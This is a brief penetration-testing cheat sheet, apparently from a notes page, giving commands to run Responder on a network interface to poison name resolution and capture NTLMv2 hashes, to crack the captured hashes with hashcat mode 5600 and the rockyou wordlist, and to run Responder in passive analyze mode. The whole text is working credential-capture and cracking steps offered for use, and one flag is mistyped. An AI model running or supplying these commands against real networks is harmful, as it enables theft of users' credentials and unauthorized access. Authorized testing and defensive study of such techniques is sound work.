Responder.py
Capture NTLMv2 Hashes with Responder
sudo responder -I eth0 - rdwv
Crack Hash with Hashcat
hashcat -m 5600 hash rockyou.txt
--help:
MODE | 5600 | NetNTLMv2 | Network Protocol
Responder Analyze Mode
responder -I eth0 -A
Last updated